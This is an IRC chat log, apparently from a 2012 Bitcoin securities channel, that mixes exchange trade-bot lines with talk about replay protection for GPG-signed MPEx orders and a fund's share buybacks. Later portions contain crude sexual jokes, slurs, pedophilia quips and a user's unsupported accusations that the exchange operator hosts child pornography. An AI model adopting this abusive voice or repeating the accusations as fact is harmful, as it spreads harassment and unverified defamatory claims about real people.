1.0BTC/share Sep 30 19:09:29 yea Sep 30 19:09:31 I sign one buy order for 1 share, then submit it 10 times Sep 30 19:09:37 [GLBSE] [GOLD] 2 @ 0.00999998 = 0.02 BTC [-] Sep 30 19:09:44 And later say "why did your system buy 10 shares, I only wanted one?" Sep 30 19:09:58 yea... Sep 30 19:10:18 Right now, you would be able to produce only one Cs. By mandating different messages, you would be protected :) Sep 30 19:10:33 indeed. Sep 30 19:10:45 Anyway, thanks for the discussion, that was enlightening :) Sep 30 19:10:51 except, in the scenario you describe, i just negrate you in the wot, can your accnt and whoopdedoo, you've managed what. Sep 30 19:11:06 understand, there's a lot more at stake here than just "what retardedness i could do". Sep 30 19:11:36 [MPEX] [S.MPOE] 24687 @ 0.00036338 = 8.9708 BTC [+] Sep 30 19:11:36 [MPEX] [S.MPOE] 42613 @ 0.00036596 = 15.5947 BTC [+] Sep 30 19:11:46 and in general i want to mandate as little as possible. having 1`000`000 contracts include an extra field Sep 30 19:11:49 Sure, but you insist on security, and that's a good thing. This would add security through forced trust (ability to produce individual messages) without any drawback. Sep 30 19:11:51 just to avoid the possibility of some pissant... Sep 30 19:11:55 seems counterproductive. Sep 30 19:12:02 mircea_popescu: no, you don't need to add anything Sep 30 19:12:08 Just reject duplicate Cs Sep 30 19:12:14 OneEyed i don't trust the signature date thing Sep 30 19:12:19 someone could just fuck with his computer clock Sep 30 19:12:34 mircea_popescu: you don't have to! The signature date just ensures that signed messages won't be the same, by construction Sep 30 19:12:36 actually, it says in the gpg spec the sigdate is not to be trusted. Sep 30 19:12:40 No need to ever *read* the content Sep 30 19:12:50 OneEyed some douche makes a contract now dated now Sep 30 19:12:51 [GLBSE] [GOLD] 1 @ 0.00999998 BTC [-] Sep 30 19:12:54 isn't that done already? i tried that sending same encrypted STAT twice, even that was rejected Sep 30 19:12:56 then one tomorrow dated august the 5th Sep 30 19:13:09 jurov you can re-encrypt the signed stat and that is accepted. Sep 30 19:13:27 ah so Sep 30 19:13:28 this is a largely theoretical point, he's proposing somebody claim that i made a fake duplicate. Sep 30 19:13:31 mircea_popescu: yeah, that's why you can't trust the date, I'm with you on this one, it makes no sense Sep 30 19:13:49 OneEyed then he could claim o really, peanuts and buttersquash w/e. Sep 30 19:14:06 the point isn't to make a system that makes human retardedness impossible, that's too hard a problem. Sep 30 19:14:11 the point is to make it manageable. Sep 30 19:14:27 mircea_popescu: but right now you *could* produce duplicate if you wanted Sep 30 19:14:57 mircea_popescu: if answers are signed, then you cannot pretend an order never arrived, and if duplicates are not accepted, you cannot pretend an order was submitted twice, and everyone's safe :) Sep 30 19:15:58 answers are in fact signed. Sep 30 19:16:32 OneEyed have you used mpex at all btw ? Sep 30 19:18:14 mircea_popescu: no, I have just read the FAQ, 20 BTC would eat much more than what I would gain, since I don't have much to trade (I just bought a couple hundreds BTC to play with) Sep 30 19:19:40 And I did my PhD thesis a long time ago on distributed systems, and worked for a long time on trust issues in those systems (including protection against replay attacks, byzantine failures, dos, …) Sep 30 19:21:00 so I'm quite familiar with the "trust" problem at hand (+, I've been using PGP then GPG for ~20 years, since Phil Zimmermann's first releases that I got from Usenet) Sep 30 19:21:45 OneEyed, then maybe it would be best to propose some sane implementation. Sep 30 19:21:58 jurov: mircea_popescu is pretty sane as far as I can see! Sep 30 19:22:28 (except that you have to trust him not to pretend you submitted the same signed message twice right now) Sep 30 19:22:35 of course... but to fix this issue mpex would need to have hash of every Cs to compare against Sep 30 19:22:41 Oops, I mean mircea_popescu's implementation, not himself, I don't know him :) Sep 30 19:22:54 *to have -> to store Sep 30 19:23:00 !ticker gigaming Sep 30 19:23:04 jurov: he already has this kind of information on Ce, it's not a big deal to double the storage for it, it's only a few bytes per message Sep 30 19:23:05 or issue cookies... brrr Sep 30 19:23:22 Invalid ticker. Sep 30 19:23:53 !ticker gigamining Sep 30 19:24:08 [GLBSE:GIGAMINING] [Bid: 0.58000001] [Ask: 0.60769999] [Spread: 0.02769998] [Last: 0.6] [24hVol: 39.40020002] [7dAvg: 0.60205744] Sep 30 19:24:25 OneEyed pretty cool Sep 30 19:36:45 [MPEX] [F.GIGA.ETF] 1500 @ 0.00044037 = 0.6606 BTC [+] Sep 30 19:39:12 [GLBSE] [MOORE] 4 @ 0.48000001 = 1.92 BTC [-] Sep 30 19:39:13 [GLBSE] [MOORE] 2 @ 0.48 = 0.96 BTC [-] Sep 30 19:39:14 [GLBSE] [MOORE] 8 @ 0.48 = 3.84 BTC [-] Sep 30 19:39:15 [GLBSE] [MOORE] 1 @ 0.47 BTC [-] Sep 30 19:39:16 [GLBSE] [MOORE] 3 @ 0.46010002 = 1.3803 BTC [-] Sep 30 19:39:17 [GLBSE] [MOORE] 3 @ 0.46000001 = 1.38 BTC [-] Sep 30 19:41:47 jurov im not issuing no cookies. Sep 30 19:41:56 bring your own damned cookies. Sep 30 19:43:58 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.84615385 BTC [-] Sep 30 19:46:49 [GLBSE] [FDBF] 3 @ 0.149253 = 0.4478 BTC [+] Sep 30 19:51:55 no cookies for ya :( Sep 30 19:52:04 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.84615385 = 1.6923 BTC [-] Sep 30 19:54:05 [GLBSE] [PUREMINING] 1 @ 0.10328 BTC [+] Sep 30 19:54:07 [GLBSE] [PUREMINING] 29 @ 0.10348 = 3.0009 BTC [+] Sep 30 19:57:29 [GLBSE] [OBSI.HRPT] 22 @ 0.049 = 1.078 BTC [-] Sep 30 20:02:00 [MPEX] [F.GIGA.ETF] 2100 @ 0.00044037 = 0.9248 BTC [+] Sep 30 20:02:29 [GLBSE] [PUREMINING] 1 @ 0.10348 BTC [+] Sep 30 20:04:59 [GLBSE] [NYAN.C] 1 @ 0.25 BTC [-] Sep 30 20:05:37 [GLBSE] [GERBITIN.PYRA] 1 @ 0.98 BTC [+] Sep 30 20:11:11 [GLBSE] [BMF] 1 @ 0.5002 BTC [-] Sep 30 20:11:13 [GLBSE] [BMF] 9 @ 0.5 = 4.5 BTC [-] Sep 30 20:18:02 [GLBSE] [GIGAMINING] 1 @ 0.60769999 BTC [+] Sep 30 20:20:06 [GLBSE] [COGNITIVE] 1 @ 0.5 BTC [+] Sep 30 20:21:03 EskimoBob: what's wrong with Romania? What's wrong with porn? Sep 30 20:21:38 [GLBSE] [FDBF] 2 @ 0.149253 = 0.2985 BTC [+] Sep 30 20:25:06 EskimoBob: I don't understand all this problem around porn. Is porn illegal where you live, or do you have any evidence that the porn hosted there is illegal? Sep 30 20:27:06 [MPEX] [S.MPOE] 59200 @ 0.00035888 = 21.2457 BTC [-] Sep 30 20:27:22 "You must obtain a signed letter of holding from Nefario as a shareholder, or pay a deposit into escrow if you are a potential investor. I really do not care if you decide not to invest with me as a result of this decision." Sep 30 20:27:29 he should ask for 20 bitcoins tbh. Sep 30 20:27:42 mircea_popescu: ? Sep 30 20:28:05 just following usagi's meltdown Sep 30 20:28:16 https://bitcointalk.org/index.php?topic=113708.msg1233162#msg1233162 Sep 30 20:29:02 [GLBSE] [ZETA-MINING] 1 @ 0.14200001 BTC [-] Sep 30 20:31:43 I think the porn actually is a bit of an issue. I wish MPEX were on a domain name that did not also host porn, just in case polimedia somehow gets blocked at my work internet because of it someday. Sep 30 20:32:15 wouldn't want to be locked out of trading for the whole work day. Sep 30 20:32:20 hm Sep 30 20:32:48 are you aware that site was there for oh, 3 years by now ? 4 ? Sep 30 20:33:29 (and also, that i happen to run the most popular blog in romanian, and this means, romanians being a little schadenfreunde-y, that various nitwits have been trying to get it offline for maybe 5 years now ?) Sep 30 20:35:34 [MPEX] [S.DICE] 900 @ 0.0034 = 3.06 BTC [+] Sep 30 20:35:50 OMFG why, why, WHY? keep ppl taking btc from investors, because its a fucking easy scam, omg 70K$ in a few months, I wish I thought of it, Oh damn I am no scammer Sep 30 20:35:57 I'm talking about some IT department filtering/blocking content at my end, not the site getting KO'd off the internet Sep 30 20:36:38 I can just see Anderson Cooper doing a story on bitcoins and porn or some stupid shit like that Sep 30 20:36:55 just like the Reddit gone wild takedown piece Sep 30 20:37:05 Bugpowder you can just use a proxy then neh ? Sep 30 20:37:22 PsychoticBoy what now ? Sep 30 20:37:33 OMFG why, why, WHY? keep ppl taking btc from investors, because its a fucking easy scam, omg 70K$ in a few months, I wish I thought of it, Oh damn I am no scammer Sep 30 20:37:44 usagi lost 7K btc in a few months Sep 30 20:37:47 o that. Sep 30 20:37:48 yeah. Sep 30 20:37:58 could be 10k, who knows. Sep 30 20:38:16 "assbot"? Sep 30 20:38:16 Do you think the result from a IRC script calculator is evidence for what exactly? Sep 30 20:38:23 read the forum even a blind man can see it Sep 30 20:38:24 why do peopkle feel compelled to insult what they don't understand ? Sep 30 20:38:42 PsychoticBoy im saying : he lost MAYBE 7k. possible 10k. Sep 30 20:38:52 idk, what's a peopkle Sep 30 20:38:56 mircea_popescu: lol differential geometry sux Sep 30 20:39:17 copumpkin lol troll Sep 30 20:39:23 all the threads concerning BMF, CPA, NYAN Sep 30 20:39:51 hm, maybe i've not been too clear above. Sep 30 20:40:01 https://bitcointalk.org/index.php?topic=113708.msg1233772#msg1233772 << reference. Sep 30 20:40:08 EskimoBob: ooh ooh Sep 30 20:40:09 do me next Sep 30 20:40:17 am I bad manager for buying half the company back? Sep 30 20:40:29 true, or it just vaporized Sep 30 20:40:40 usagi so are you a guy or a girl Sep 30 20:40:48 i see this question posed a lot Sep 30 20:40:48 initial value was a lot higher than it is today Sep 30 20:40:56 jcpham: I do too, but I don't see why it is Sep 30 20:40:57 EskimoBob: lololol what a troll Sep 30 20:41:16 Diablo-D3 i recall reading in the forums you bought back way over nav. is it true ? Sep 30 20:41:17 copumpkin i'm so curious now Sep 30 20:41:28 mircea_popescu: way over? no Sep 30 20:41:33 jcpham: I'm curious to see mircea_popescu's penis too, but it is inappropriate to ask Sep 30 20:41:41 .g nsfw pula mea Sep 30 20:41:42 mircea_popescu: http://trilema.com/2010/nsfw-pula-mea/ Sep 30 20:41:43 I dont listen to trolls I dont really care, but the fact is, the NAV is decreased from the start Sep 30 20:41:45 there you go copumpkin Sep 30 20:41:49 mircea_popescu: nav before buy back was almost 0.07, average buy back was a little over 0.07, maximum buyback was 0.10 Sep 30 20:41:49 i was going to say that i thought mircea_popescu was actually female Sep 30 20:41:56 until you brought up the penis Sep 30 20:41:59 mircea_popescu: that's a different color than what I expected Sep 30 20:42:10 women usually notice the different length first. Sep 30 20:42:14 so i guess you're a pedophile. Sep 30 20:42:18 lol Sep 30 20:42:21 mircea_popescu: oh, the length is what I expected it to be Sep 30 20:42:25 i can never understand what the shit is happening in this channel Sep 30 20:42:26 but the color surprised me Sep 30 20:42:29 just people yelling Sep 30 20:42:39 man Sep 30 20:42:45 maybe we should pay for a sex change for usagi Sep 30 20:42:57 1K, 7K whats the difference, its a awfull lot of cash Sep 30 20:43:05 I mean, he clearly wants to be the little girl, and mircea_popescu clearly wants a little girl.... Sep 30 20:43:16 that you did Sep 30 20:43:26 i don't want a little girl diablo. i want grown girls, such as Sep 30 20:43:33 http://trilema.com/2011/test-de-cultura-vizuala-xii/ Sep 30 20:43:49 mircea_popescu is an ass man? Sep 30 20:43:50 not clicking the link Sep 30 20:43:52 little girls, just watch toddlers and tiara`s on TLC. Pedophile on national TV Sep 30 20:44:10 Diablo-D3 from the back im an ass man. from the front not so much Sep 30 20:44:12 ouch Sep 30 20:44:14 PsychoticBoy: very few TV shows make me want to murder people Sep 30 20:44:21 this one does Sep 30 20:44:26 this one does. Sep 30 20:44:43 jcpham it's very simple to explain what goes on in irc : we're applying ito calculus to differential geometry Sep 30 20:44:46 and copumpkin's mom. Sep 30 20:44:51 see I dont get the point of showing that crap on tv Sep 30 20:44:55 !pl CPA 0.1 Sep 30 20:45:02 jcpham: what mircea_popescu said Sep 30 20:45:05 that doesnt work Sep 30 20:45:29 its a good idea Sep 30 20:45:31 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 30 20:45:33 see, that's why I hate it when people talk about martingale gambling here, cause it's silly to use the inferior meaning of martingale when the superior one is way better Sep 30 20:45:38 jesus lagbot Sep 30 20:45:43 I wish I hadn't sold my NYAN.A for .9 Sep 30 20:45:46 talk about unpredictable stochastic processes Sep 30 20:45:48 semimartingales! Sep 30 20:45:57 geometric brownian motion! Sep 30 20:46:00 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.04 BTC. Capital gain: -0.06 BTC. Total: -0.05430312 BTC. (-54.3%) Sep 30 20:46:07 s/geometric/gastric/ Sep 30 20:46:11 and my mom, of course Sep 30 20:46:17 Bugpowder why, is it over .9 now ?! Sep 30 20:46:34 copumpkin stop getting your mom involved in everything. Sep 30 20:46:49 mircea_popescu: alright, but she'll be disappointed Sep 30 20:47:04 no moms in #bitcoin-ass Sep 30 20:47:10 [GLBSE] [NYAN.B] 1 @ 0.96999999 BTC [+] Sep 30 20:47:10 ets Sep 30 20:48:38 :mircea_popescu no cause usagi came in and bought a few shares at .99 after I sold... I lost 1.8 bitcoins on the trade and I'm very upset Sep 30 20:48:45 Diablo-D3 re the mismanagement if you didn't buy way over nav then it can't really be said you're a bad manager for buying back Sep 30 20:49:09 Bugpowder you should pay someone to malign, troll and misrepresent usagi's posts. Sep 30 20:49:10 mircea_popescu: yeah, I bought a smidgen over nav Sep 30 20:49:36 in the circumstances pretty much anyone sane would have used some cash to buy back and relieve pressure Sep 30 20:49:39 I panicked when I saw NYAN.A had 2200 shares of OBSI.HRPT what can I say Sep 30 20:49:43 what with the delisting-relisting etc stuff Sep 30 20:50:00 Bugpowder theoretically the nyan series is a cdo, or something Sep 30 20:50:08 yeah Sep 30 20:50:28 It's like a CDO with arbitrary swappage of components Sep 30 20:50:28 this channel is ridiculous :) Sep 30 20:50:43 Although I should have just been 1 portfolio, tranched Sep 30 20:50:52 Bugpowder indeed. Sep 30 20:51:09 Then you don't have to worry about all this swapping shit Sep 30 20:51:22 when the swaps and buybacks occur is totally opaque Sep 30 20:51:24 you mean sorta like mpcd does it. Sep 30 20:51:37 yes Sep 30 20:51:43 color me copumpkinized. Sep 30 20:51:58 MPCD is easy to understand Sep 30 20:52:12 [GLBSE] [FPGAMINING] 5 @ 0.43334 = 2.1667 BTC [+] Sep 30 20:52:18 its just a puppy yet, i made a 1k thing to test it out. Sep 30 20:52:27 im thinking on nov when this one ends i make a 10k one Sep 30 20:52:39 course by then there won't be much left standing to put money in i fear. Sep 30 20:52:45 Although I wonder about how the liquidity issue of NYAN.A and Patricks fund will affect it, come Nov 1. Sep 30 20:53:12 talking about MPCD. Sep 30 20:53:19 Bugpowder patrick cut interest so there's already a shortfall on that count Sep 30 20:53:30 on the other hand, it made a little more on mpoe bonds than expected Sep 30 20:54:05 right but is the capital return on Patricks being done through the market, or private withdrawl Sep 30 20:54:14 it was private deposit/private withdrawal Sep 30 20:54:33 i told him at the time how's it going to be withdrawn so im thinking he must have plans in place Sep 30 20:54:38 feel free to ask him tho Sep 30 20:54:38 ok Sep 30 20:54:45 I will Sep 30 20:56:12 [GLBSE] [JAH] 1 @ 0.12999999 BTC [+] Sep 30 20:57:30 course i don't ubnderstand how/why would nyan.a be under 1 if b is worth over 0 Sep 30 21:00:37 [MPEX] [S.MPOE] 53667 @ 0.00035888 = 19.26 BTC [-] Sep 30 21:00:39 [MPEX] [S.MPOE] 7833 @ 0.00035878 = 2.8103 BTC [-] Sep 30 21:01:01 nice Sep 30 21:01:16 [MPEX] [O.BTCUSD.C110T] 190 @ 0.27340354 = 51.9467 BTC [+] Sep 30 21:01:44 I predict S.MPOE rally after all the other MPEX securities pay their monthly dividends. Sep 30 21:01:50 (hoping) Sep 30 21:02:02 tbh i think the price drop has to do with secfearz Sep 30 21:03:14 could be though it did bounce to .0004 after that. Sep 30 21:03:28 !ticker gigamining Sep 30 21:03:40 [GLBSE:GIGAMINING] [Bid: 0.58000001] [Ask: 0.60769999] [Spread: 0.02769998] [Last: 0.60769999] [24hVol: 39.45790002] [7dAvg: 0.60163888] Sep 30 21:04:31 [GLBSE] [BMMO] 1 @ 0.07684969 BTC [+] Sep 30 21:04:45 yeah but then got sold into that Sep 30 21:04:48 eh who knows Sep 30 21:05:00 bitcoin markets are so far from efficient... Sep 30 21:07:52 ok so matthewh3 is startying a fund ? Sep 30 21:08:14 what i'd like to see is someone come up with the bright ideea of putting volume rules in his fund contract Sep 30 21:09:02 "this fund will never invest in any security that has less than 100 btc daily volume ; will divest shoudl any assets hold drop under that limit and will never invest more than x% based on a volume calculation" Sep 30 21:10:08 !ticker S.MPOE Sep 30 21:10:09 [MPEX:S.MPOE] 1day: 0.00035878 / 0.00036367 / 0.0003721 (3001270 shares, 1,091.47 BTC), 30day: 0.00034 / 0.00039261 / 0.00042 (61513679 shares, 24,151.16 BTC) Sep 30 21:15:55 mircea_popescu: what's B.BITB? Sep 30 21:16:20 mm Sep 30 21:16:24 !ticker B.BITB Sep 30 21:16:51 Invalid ticker. Sep 30 21:16:53 jesus what's with the bot. Sep 30 21:17:02 FabianB i can't say it rings a bell, what is it ? Sep 30 21:17:12 o o o on the bottom Sep 30 21:17:21 i should prolly get rid of that. some offering that never happened. Sep 30 21:19:56 [GLBSE] [GIGAMINING] 1 @ 0.60769999 BTC [+] Sep 30 21:20:56 so gigavps terms of upgrade just changed. Sep 30 21:21:07 who was hounding me with q's about what giga.etf will do ? Sep 30 21:21:18 me Sep 30 21:21:27 ic Sep 30 21:21:51 [GLBSE] [BITCOINRS] 3 @ 0.045 = 0.135 BTC [-] Sep 30 21:22:22 anyway, new terms : 1 giga for 4 tera free or 1 giga for 15 terra at .29 Sep 30 21:23:15 yes, with gigamining, what about f.giga.etf Sep 30 21:26:17 [MPEX] [S.MPOE] 32450 @ 0.00036121 = 11.7213 BTC [+] Sep 30 21:26:27 [GLBSE] [BDK.BND] 15 @ 0.025 = 0.375 BTC [-] Sep 30 21:26:52 same as before. Sep 30 21:27:47 ok Sep 30 21:28:19 but the 11 extra terras seem to be implicitly valued at .29 so then .026666 per or such Sep 30 21:28:38 636363 i mean Sep 30 21:29:30 you need to consider the entire price, stock + payment / 15 Sep 30 21:31:28 stock's value is 4 shares Sep 30 21:31:31 the remaining 11 are .29 Sep 30 21:32:03 the stock's value is what the ask is Sep 30 21:32:11 err bid Sep 30 21:32:18 yes and the bid is 4 shares :D Sep 30 21:37:48 [GLBSE] [GIGAMINING] 1 @ 0.60769999 BTC [+] Sep 30 21:37:50 [GLBSE] [GIGAMINING] 1 @ 0.6077 BTC [+] Sep 30 21:37:51 [GLBSE] [GIGAMINING] 2 @ 0.6095 = 1.219 BTC [+] Sep 30 21:37:52 [GLBSE] [GIGAMINING] 1 @ 0.6097 BTC [+] Sep 30 21:39:53 [MPEX] [F.GIGA.ETF] 2705 @ 0.00044036 = 1.1912 BTC [-] Sep 30 21:39:55 [MPEX] [F.GIGA.ETF] 1190 @ 0.00044036 = 0.524 BTC [-] Sep 30 21:39:56 [MPEX] [F.GIGA.ETF] 7641 @ 0.00044036 = 3.3648 BTC [-] Sep 30 21:39:57 [MPEX] [F.GIGA.ETF] 5900 @ 0.00044036 = 2.5981 BTC [-] Sep 30 21:39:58 [MPEX] [F.GIGA.ETF] 1866 @ 0.00044036 = 0.8217 BTC [-] Sep 30 21:39:59 [MPEX] [F.GIGA.ETF] 5006 @ 0.00044036 = 2.2044 BTC [-] Sep 30 21:40:00 [MPEX] [F.GIGA.ETF] 3288 @ 0.00044036 = 1.4479 BTC [-] Sep 30 21:40:01 [MPEX] [F.GIGA.ETF] 1673 @ 0.00044036 = 0.7367 BTC [-] Sep 30 21:40:02 [MPEX] [F.GIGA.ETF] 3600 @ 0.00044036 = 1.5853 BTC [-] Sep 30 21:40:03 [MPEX] [F.GIGA.ETF] 720 @ 0.00044036 = 0.3171 BTC [-] Sep 30 21:40:04 [MPEX] [F.GIGA.ETF] 141 @ 0.00044036 = 0.0621 BTC [-] Sep 30 21:40:06 [MPEX] [F.GIGA.ETF] 4700 @ 0.00044036 = 2.0697 BTC [-] Sep 30 21:40:07 [MPEX] [F.GIGA.ETF] 5100 @ 0.00044036 = 2.2458 BTC [-] Sep 30 21:40:07 [MPEX] [F.GIGA.ETF] 590 @ 0.00044036 = 0.2598 BTC [-] Sep 30 21:40:08 [MPEX] [F.GIGA.ETF] 1376 @ 0.00044036 = 0.6059 BTC [-] Sep 30 21:40:09 [MPEX] [F.GIGA.ETF] 4400 @ 0.00044036 = 1.9376 BTC [-] Sep 30 21:40:10 [MPEX] [F.GIGA.ETF] 10392 @ 0.00044036 = 4.5762 BTC [-] Sep 30 21:40:11 [MPEX] [F.GIGA.ETF] 11170 @ 0.00044036 = 4.9188 BTC [-] Sep 30 21:40:12 [MPEX] [F.GIGA.ETF] 8700 @ 0.00044034 = 3.831 BTC [-] Sep 30 21:40:13 [MPEX] [F.GIGA.ETF] 6800 @ 0.0004403 = 2.994 BTC [-] Sep 30 21:40:14 [MPEX] [F.GIGA.ETF] 2206 @ 0.00044018 = 0.971 BTC [-] Sep 30 21:40:15 [MPEX] [F.GIGA.ETF] 5814 @ 0.00044015 = 2.559 BTC [-] Sep 30 21:40:16 [MPEX] [F.GIGA.ETF] 22 @ 0.00044 = 0.0097 BTC [-] Sep 30 21:40:26 [GLBSE] [SS] 2 @ 0.0178 = 0.0356 BTC [+] Sep 30 22:01:20 [GLBSE] [PUREMINING] 1 @ 0.1016 BTC [-] Sep 30 22:02:47 [MPEX] [O.BTCUSD.C120T] 500 @ 0.22389262 = 111.9463 BTC [+] Sep 30 22:02:55 [GLBSE] [PUREMINING] 1 @ 0.10153 BTC [-] Sep 30 22:03:57 [GLBSE] [PUREMINING] 4 @ 0.101521 = 0.4061 BTC [-] Sep 30 22:06:27 [MPEX] [O.BTCUSD.P050T] 10 @ 0.00020676 = 0.0021 BTC [-] Sep 30 22:06:29 [GLBSE] [PUREMINING] 1 @ 0.10152 BTC [-] Sep 30 22:07:57 [GLBSE] [YABMC] 1 @ 0.07973999 BTC [+] Sep 30 22:08:39 [GLBSE] [PUREMINING] 4 @ 0.101322 = 0.4053 BTC [-] Sep 30 22:09:45 !ticker ABM Sep 30 22:09:49 !ticker FDBF Sep 30 22:10:04 assbot? Sep 30 22:10:08 [GLBSE:ABM] [Bid: 0.11] [Ask: 0.37999999] [Spread: 0.26999999] [Last: 0.10000001] [24hVol: ] [7dAvg: 0.25357143] Sep 30 22:10:21 [GLBSE:FDBF] [Bid: 0.121] [Ask: 0.149253] [Spread: 0.028253] [Last: 0.149253] [24hVol: 23.134212] [7dAvg: 0.13916207] Sep 30 22:10:23 [GLBSE] [PUREMINING] 8 @ 0.1013 = 0.8104 BTC [-] Sep 30 22:10:27 ;;botsnack Sep 30 22:10:27 Forget the snack, just send me some bitcoins at 1MgD6rah5zUgEGYZnNmdpnXMaDR3itKYzU :) Sep 30 22:10:32 oh not you Sep 30 22:10:51 !botsnack Sep 30 22:11:05 poor gribs Sep 30 22:11:21 [GLBSE] [ASICMINER] 7 @ 0.109493 = 0.7665 BTC [-] Sep 30 22:12:03 [GLBSE] [JTGB] 3 @ 0.2 = 0.6 BTC [+] Sep 30 22:12:07 [GLBSE] [PUREMINING] 1 @ 0.1012 BTC [-] Sep 30 22:12:27 [GLBSE] [PUREMINING] 70 @ 0.101 = 7.07 BTC [-] Sep 30 22:14:57 [GLBSE] [GIGAMINING] 2 @ 0.58000001 = 1.16 BTC [-] Sep 30 22:17:59 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Sep 30 22:20:22 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 30 22:21:45 [GLBSE] [GIGAMINING] 1 @ 0.56110002 BTC [-] Sep 30 22:22:13 [GLBSE] [NASTY] 1 @ 0.3995 BTC [+] Sep 30 22:22:15 [GLBSE] [NASTY] 1 @ 0.4 BTC [+] Sep 30 22:22:57 [GLBSE] [GIGAMINING] 3 @ 0.56110003 = 1.6833 BTC [+] Sep 30 22:22:59 [GLBSE] [TEEK.A] 2 @ 0.874 = 1.748 BTC [-] Sep 30 22:23:01 [GLBSE] [TEEK.A] 2 @ 0.87498 = 1.75 BTC [+] Sep 30 22:23:02 [GLBSE] [TEEK.A] 3 @ 0.87499 = 2.625 BTC [+] Sep 30 22:23:03 [GLBSE] [TEEK.A] 4 @ 0.9 = 3.6 BTC [+] Sep 30 22:23:05 [GLBSE] [TEEK.A] 14 @ 0.905 = 12.67 BTC [+] Sep 30 22:25:22 [GLBSE] [GIGAMINING] 2 @ 0.5609 = 1.1218 BTC [-] Sep 30 22:26:35 [GLBSE] [GIGAMINING] 3 @ 0.5607 = 1.6821 BTC [-] Sep 30 22:26:49 [GLBSE] [GIGAMINING] 5 @ 0.5607 = 2.8035 BTC [-] Sep 30 22:26:51 [GLBSE] [GIGAMINING] 2 @ 0.5606 = 1.1212 BTC [-] Sep 30 22:26:52 [GLBSE] [GIGAMINING] 1 @ 0.56 BTC [-] Sep 30 22:27:11 [GLBSE] [GIGAMINING] 1 @ 0.56 BTC [-] Sep 30 22:30:00 mircea_popescu: Is it true that you peddle porn on the same server that you are claiming to run a legitimate exchange? Sep 30 22:30:04 [GLBSE] [COGNITIVE] 1 @ 0.46830001 BTC [-] Sep 30 22:30:33 mircea_popescu: Is it true that you sell child porn? Sep 30 22:30:35 Bastone nope. Sep 30 22:31:05 there's a 4chan board, a digg style aggregator, a romanian language blog, abitcoin forum and a bunch of other stuff on the domain. Sep 30 22:31:06 mircea_popescu: How can you say no when there is evidence that you are in fact hosting porn on the server that hosts MPEx? Sep 30 22:31:15 your question was as to peddle. Sep 30 22:31:26 Oh, so you don't sell the child porn, you just host it? Sep 30 22:31:40 as far as i know there's no child porn. Sep 30 22:31:40 [GLBSE] [COGNITIVE] 2 @ 0.4683 = 0.9366 BTC [-] Sep 30 22:31:45 [MPEX] [S.MPOE] 5500 @ 0.00036498 = 2.0074 BTC [+] Sep 30 22:31:58 it's an imageboard, users post things. do you know what an imageboard is ? Sep 30 22:32:03 mircea_popescu: I noticed that you list shares on GLBSE but then bash the exchange? Are you only hosting shares there in order to try to drive funds to your worthless exchange? Sep 30 22:32:14 [GLBSE] [GIGAMINING] 4 @ 0.55000001 = 2.2 BTC [-] Sep 30 22:32:16 [GLBSE] [GIGAMINING] 1 @ 0.55 BTC [-] Sep 30 22:32:17 [GLBSE] [GIGAMINING] 4 @ 0.55 = 2.2 BTC [-] Sep 30 22:32:30 Bastone that's a bizzare notion. mpex has ~80% of all btc securities volume Sep 30 22:32:36 this glbse thing you ask about is a blip. Sep 30 22:32:37 mircea_popescu: How many users have paid the ridiculous sign up fee for your exchange? Sep 30 22:32:44 why do you have such a hard-on for mircea, bastone? Sep 30 22:32:46 about a hundred or so Sep 30 22:32:49 [GLBSE] [COGNITIVE] 1 @ 0.46827 BTC [-] Sep 30 22:32:53 the revenue is published you know. Sep 30 22:33:11 mircea_popescu: No I didn't know. Your website is unusable for any normal person. Sep 30 22:33:25 that's unfortunate, cause the revenue is published on bitcointalk too. Sep 30 22:33:32 All your forum posts are so filled with garbage hate posts, it's hard to find any legitimate information about your operation. Sep 30 22:33:44 hm. Sep 30 22:33:55 lemme have the girl dig it up for you then Sep 30 22:34:02 Smoovious: He's had hundreds of signups. lol I'm sure a domain name is right around the corner. Sep 30 22:34:15 the signup fee was waived during the beta iirc Sep 30 22:34:20 mircea_popescu: Why have a girl dig it up? Are you incapable of providing a link? Sep 30 22:34:22 https://bitcointalk.org/index.php?topic=64962.msg1230888#msg1230888 here you go Bastone Sep 30 22:34:37 Bastone re domain names : try mpex.us for instance. Sep 30 22:34:45 [GLBSE] [COGNITIVE] 8 @ 0.46817 = 3.7454 BTC [-] Sep 30 22:34:53 [GLBSE] [GIGAMINING] 1 @ 0.60949997 BTC [+] Sep 30 22:34:57 Bastone you are being remarkably cheeky. i'm the owner/ceo of that thing. simmer down. Sep 30 22:34:58 That doesn't list signup revenue. Sep 30 22:35:18 *Revenue from new accounts : 330 BTC Sep 30 22:35:21 did you notice that ? Sep 30 22:35:25 You don't like trolls mircea_popescu? Sep 30 22:35:33 No, I didn't. Sep 30 22:35:36 Smoovious, did you not just see him mention mpex.us? Sep 30 22:35:38 so read more, talk less. Sep 30 22:35:49 You don't like trolls? Sep 30 22:35:56 But you like to troll so much. Sep 30 22:36:03 resolved pretty much instantly for me Sep 30 22:36:04 Bastone: you don't even know how to troll obviously Sep 30 22:36:06 Funny, he paid for a .us to save a few bucks... haha Sep 30 22:36:06 it's not a matter of that. you have the benefit of talking to someone much more important than you, in the scvheme of things. Sep 30 22:36:08 don't blow it. Sep 30 22:36:16 totally a cheap ass fake exhange operator. Sep 30 22:36:21 sigh. Sep 30 22:36:25 trolls enough on the forum these days Sep 30 22:36:28 More important than me? Sep 30 22:36:31 [GLBSE] [GSDPT] 49 @ 0.0034 = 0.1666 BTC [+] Sep 30 22:36:35 Bastone, go back to bitcointalk Sep 30 22:36:42 Your self importance is irrelevant. Sep 30 22:36:57 right. s.mpoe paid in dividends ~25% of all bitcoins mined in september. Sep 30 22:37:02 give that a minute to sink in. Sep 30 22:37:06 mircea_popescu is a fake trolling piece of child porn peddling shit. Sep 30 22:37:08 [GLBSE] [YABMC] 3 @ 0.07973999 = 0.2392 BTC [+] Sep 30 22:37:23 o look, off webchat too. dun dun dun. Sep 30 22:37:28 Could everyone take his: He you got a small dick! Talk elsewhere Sep 30 22:37:37 mircea_popescu: Since you are the only owner of your lame ass securities, I'm sure you can inflate the numbers to whatever you want. Sep 30 22:37:42 PsychoticBoy: what do you have against small dicks? You troll :) Sep 30 22:37:47 lol Sep 30 22:37:58 Bastone the trades go out on tickers you know. Sep 30 22:38:01 PsychoticBoy: btw, do 